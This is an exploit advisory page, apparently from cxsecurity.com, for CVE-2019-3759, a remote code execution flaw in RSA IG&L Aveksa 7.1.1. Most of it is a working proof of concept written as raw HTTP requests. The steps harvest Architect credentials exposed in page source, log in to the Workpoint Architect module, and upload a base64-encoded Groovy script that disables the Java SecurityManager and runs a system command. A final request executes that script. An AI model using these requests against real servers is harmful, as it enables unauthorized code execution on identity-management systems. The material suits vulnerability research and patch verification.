RSA IG+L Aveksa 7.1.1 Remote Code Execution

2020.07.07
pl Jakub Palaczynski (PL) pl
Risk: High
Local: No
Remote: Yes
CVE: CVE-2019-3759
CWE: CWE-94


CVSS Base Score: 5.5/10
Impact Subscore: 4.9/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: None

# Exploit Title: RSA IG&L Aveksa 7.1.1 - Remote Code Execution # Date: 2019-04-16 # Exploit Author: Jakub Palaczynski, Lukasz Plonka # Vendor Homepage: https://www.rsa.com/ # Version: 7.1.1, prior to P02 # CVE : CVE-2019-3759 # (all vulnerable versions can be found at https://www.dell.com/support/security/pl-pl/details/DOC-106943/DSA-2019-134-RSA-Identity-Governance-and-Lifecycle-Product-Security-Update-for-Multiple-Vulnerabi) Information: Authenticated users can bypass authorization and get full access to Workpoint Architect module. This module gives possibility to run Groovy scripts which results in Code Execution. 1. First user needs to learn username and password for Architect (different from Aveksa login). Sample request: https://AVEKSA_HOST/aveksa/main?Oid=193783&ReqType=GetPartial&PageID=ChangeRequestJobPageData&WFObjectID=1%3AWPDS&crID=193783&isAjax=false search for "<IFRAME" in source of HTML and note username and password 2. Log into Architect. Sample request: POST /aveksaWFArchitect/auth/login/ HTTP/1.1 Host: AVEKSA_HOST User-Agent: python wp-product-name: wp-architect Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 146 Cookie: JSESSIONID=session Connection: close {"user":"USERNAME","password":"PASSWORD","dsn":"WPDS","product":{"name":"wp-architect","version":"4.40.16"}} 3. Creating new script that bypasses Java Security Policy and runs "id" system command. * "statementText" - contains base64-encoded Groovy code * "name" (at the end) - script name that must be unique * Save "scriptId" from the response as it is necessary for next request. POST /aveksaWFArchitect/scripts/?refresh=true&replace=false&checkSyntax=false&saveWithRollbackVersion=false HTTP/1.1 Host: AVEKSA_HOST User-Agent: python wp-product-name: wp-architect Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 733 Cookie: JSESSIONID=session Connection: close {"statements":[{"scriptLineId":"-26:AUTOGEN","action":"insert","luDate":null,"luId":"","rowVersion":0,"sequence":1,"scriptClassId":17,"sourceName":"LOCAL","scriptId":"","name":"","validationStatus":0,"validationStatusMsg":"","statement":{"statementText":"U3lzdGVtLnNldFNlY3VyaXR5TWFuYWdlcihudWxsKTsKJ2lkJy5leGVjdXRlKCkudGV4dA==","statementJava":{"javaClass":"","ejb":false,"ejbVersion":"","jndiName":"","method":"","methodIsStatic":false,"returns":{"location":"system","name":""},"useInstance":false,"useInstanceObjectName":"","action":"insert"}}}],"scriptId":"-27:AUTOGEN","action":"insert","luDate":null,"luId":"","rowVersion":0,"name":"SCRIPTNAME","scriptTypeId":3,"validationStatus":0,"falseMsg":"","description":"","emitEvents":false,"errorText":"","saveMethod":"Architect"} 4. Running created script: * In the response you have result of your command PUT /aveksaWFArchitect/scripts/execute/ HTTP/1.1 Host: AVEKSA_HOST User-Agent: python wp-product-name: wp-architect Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 58 Cookie: JSESSIONID=session Connection: close {"id":"SCRIPTID_OF_CREATED_SCRIPT","newTransaction":false,"symbolTable":{}}


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top